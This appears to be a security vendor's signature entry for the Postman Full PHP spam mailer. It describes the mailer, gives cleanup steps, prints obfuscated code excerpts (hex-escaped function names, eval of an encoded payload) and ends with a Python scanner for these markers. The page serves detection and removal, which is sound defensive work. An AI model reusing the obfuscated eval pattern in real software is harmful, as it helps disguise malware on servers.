Malware Signatures


php.hacktool.postman-full.001

Mailers are a category of scripts that hackers install on compromised servers to send out spam and anonymous emails.
They take advantage of the servers' bandwidth and other resources to send out tons of spam emails in a short time. Moreover, the headers of such emails don't contain traces of the hackers; they lead back to the hacked server,
so the whole spam campaign remains quite anonymous. Hacked servers are not a scarce resource, and spammers don't care much if one of them gets blacklisted for spamming: they can easily move to another server. However, to minimize the risk of
blacklisting, they usually distribute the mailing evenly between several hacked servers.
Postman Full is a sophisticated mailing script. It is based on the PHPMailer class created by Brent R. Matzelle and used by lots of legitimate software. A copy of this class is included in Postman in encrypted form.
The main purpose of Postman Full is mass mailing (email spamming). It provides a convenient interface for spammers. For example, lists of recipients can be specified manually in a special edit area or extracted from local and remote files.
The same applies to the message body of the emails.

Affecting

Any server with PHP enabled.

Cleanup

Delete the mailer script and scan your server for other types of malware, specifically for backdoors. Make sure to identify and close the security hole.
You also need to check whether your server's IP address got blacklisted by various anti-spam blacklist providers as a result of the hacker activity.
You can also sign up with us and let our team remove the malware for you.

Dump

...typical excerpts from various mailer scripts...
...

// PostMan Full 3.5
// by dr.kenpeter@yahoo.com
/* <![CDATA[ */
...
/* ]]> */

// <H4ck3rDr381 AT yahoo DOT com>
//
// YOUR PASSWORD IS ONLY YOURS!
// WITHOUT IT YOU CANNOT RUN THE SCRIPT!
// KEEP IT WITH YOU AND DON'T SHARE IT!
// --
// SUA SENHA EH SOMENTE SUA!
// SEM ELA, VOCE NAO PODE RODAR O SCRIPT!
// MANTENHA ELA CONSIGO E NAO COMPARTILHE-A!

...

// Default Method Config
define("_DEFAULT_BASIC_", "mail"); //options are: smtp, mail
define("_DEFAULT_LIST_", "file"); //options are: textarea, url, file
define("_DEFAULT_LIST_START_", 1); //the email to start sending the list. 0 and 1 for no use.
define("_DEFAULT_MESSAGE_", "file"); //options are: textarea, url, file

define("_SCRIPT_VERSION_", "Full 3.5-insec");

...

<title><?=os("PostMan " . _SCRIPT_VERSION_ . "." . rand(0,10) . " by Hackerdre81 <Hackerdre81 at yahoo dot com>")?></title>

....

<body onload="loadFunctions();">
<h1><?=os("PostMan " . _SCRIPT_VERSION_ )?></h1>
<h2><?=os("by Hackerdre81 - hackerdre81@yahoo.com

...

${0} = "\x75\x6e\x65\x63\x72\x79\x70\x74";

function unecrypt($string, $pass)
{

${1} = "\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";
${2} = ~(${1}(str_replace(array("", "@", "(", "^", ")", "[", "#", "<"), array("0","a","o","b","r","l","0","M"), $string)));
echo "<h2 class='h2green'>Patched by XXXXX</h2>\r\n";
return str_replace(array('$a =', 'unset($a);'),array('# $a =', '# unset($a);'),${2});

}

...

####!DELIMITER!####
eval(${0}("x38x76x58x79x39x66x4cx31x32x35x37x66x77x74x2bx2fx6dx5ax40x54x6d"
. "x71x43x59x6dx28x75x67x6ex4ax43x52x69x35x71x52x69x34x7ax58x6ex4a"
....
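The traits visible in the description and dump above (the "PostMan Full" banner, the `####!DELIMITER!####` marker, function names hidden in `\xNN` string literals, and `eval()` called through a variable-variable) are enough to write a simple file scanner for the cleanup step. The script below is an added example, not part of this page or of any scanner product; the `SUSPECT` and `BENIGN` samples are constructed, and the indicator names are my own labels.

```python
import re
from pathlib import Path

# Plain-text markers taken from the dump on this page.
LITERAL_MARKERS = ["PostMan Full", "####!DELIMITER!####",
                   "function unecrypt(", "_SCRIPT_VERSION_"]
# A double-quoted PHP string built only from \xNN escapes (4+ bytes), e.g. "\x75\x6e...".
HEX_STRING_RE = re.compile(r'"((?:\\x[0-9a-fA-F]{2}){4,})"')
# eval() fed through a variable-variable such as ${0}, as in eval(${0}(...)).
EVAL_VARVAR_RE = re.compile(r'eval\s*\(\s*\$\{\d+\}\s*\(')

def decode_hex_literal(lit: str) -> str:
    """Turn the escape text of a hex-only PHP literal into the string PHP would see."""
    return bytes.fromhex(lit.replace("\\x", "")).decode("latin-1")

def postman_indicators(source: str) -> list[str]:
    """Return the indicators found in one PHP source text (empty list = nothing seen)."""
    hits = [f"marker:{m}" for m in LITERAL_MARKERS if m in source]
    for lit in HEX_STRING_RE.findall(source):
        name = decode_hex_literal(lit)
        # A hex-obfuscated literal that spells a bare identifier is a hidden function name.
        if re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]*", name):
            hits.append(f"hex-encoded name:{name}")
    if EVAL_VARVAR_RE.search(source):
        hits.append("eval-via-variable-variable")
    return hits

def scan_tree(root: Path) -> dict[str, list[str]]:
    """Map every .php file under root that shows indicators to what was found."""
    report = {}
    for path in root.rglob("*.php"):
        hits = postman_indicators(path.read_text(encoding="utf-8", errors="ignore"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed samples: a fragment shaped like the dump above, and an ordinary PHPMailer caller.
SUSPECT = r'''<?php
// PostMan Full 3.5
define("_SCRIPT_VERSION_", "Full 3.5-insec");
${0} = "\x75\x6e\x65\x63\x72\x79\x70\x74";
function unecrypt($string, $pass) {
    ${1} = "\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";
    return ~(${1}($string));
}
####!DELIMITER!####
eval(${0}("CONSTRUCTED_PLACEHOLDER_PAYLOAD"));
'''
BENIGN = '<?php\nrequire "PHPMailer.php";\n$mail = new PHPMailer();\n$mail->send();\n'
```

Run `scan_tree(Path("/var/www"))` (or whatever the document root is) to get a file-to-indicators map; a legitimate PHPMailer install produces no hits, because the markers are specific to the mailer's banner and obfuscation wrapper rather than to PHPMailer itself.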